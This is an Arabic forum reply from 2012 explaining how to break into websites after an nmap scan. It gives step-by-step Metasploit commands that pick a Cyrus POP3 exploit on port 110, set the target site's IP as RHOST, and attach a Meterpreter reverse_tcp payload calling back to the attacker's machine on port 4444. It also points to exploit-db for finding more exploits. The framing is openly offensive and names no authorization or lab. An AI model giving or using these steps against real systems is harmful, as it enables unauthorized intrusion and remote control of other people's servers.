السلام عليكم
إختراق المواقع عنطريق البورت ممكن بمشروع المتاسبلويت الموجود بالباك تراك
بس لازم تعرف طريقة الإستغلال وهل البورت الموفتوح به ثغرة أو لا
بالنسبة للبحث عن الثغرات لها مواقعها مثل
http://www.exploit-db.com/search/
يكفي تحط البورت والثغرات التي تريدها مواقع أجهزة ,,, وهو يعطيك أحدث الثغرات
الأن بالنسبة للفحص اللي عامله لاحظة وجود البورت 110 الخاص بمنفذ pop3 مفتوح ويمكن إستغلاله عنطريق المتا سبلويت
استغلالها كالتالي
بعد فتح المتاسبلويت
ضع الامر search pop3
ورح يظهر لك الاستغلالها المتوفرة
اختر الاستغلال بالامر use متبوعا بالاسم او الرابط هكذا
use linux/pop3/cyrus_pop3d_popsubfolders
ثم show options لأظهار الخيارات المتاحة والمطلوبة من قبل المهاجم
عند تنفيذ الامر انظر ما المطلوب فقط لمطلوب الاي بي المستهدف والبورت
البورت اكتشفناه اثناء الفحص انه مفتوح والاي بي هو الاي بي او الموقع الذي تم فحصه واكتشاف انا المنفذ
110 مفتوح
نكمل الاستغلال بعد تحديد الاي بي المراد اختراقه والذي ظهر لنا اثناء الفحص ونقوم بتحديد بالامر
set RHOST xx.xxx.xxx.xxx
xx.xxx.xxx.xxx:أيبي الموقع
ثم نختار البايلود ويفضل تختار الميتربريتر او اي شيء تريده
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST xxx.xxx.xxx اي بي جهاز المهاجم
set LPORT 4444 بورت مفتوح في جهاز المهاجم
ومن ثم امر الاستغلال exploit
يمكن هذه قديمة يوجد افضل منها فقط انت وبحثك
بالتوفيق
04-27-2012, 01:44 PM
رد: بعد فحص السيرفر بــnmap كيف الاستغلال
العرض الشجري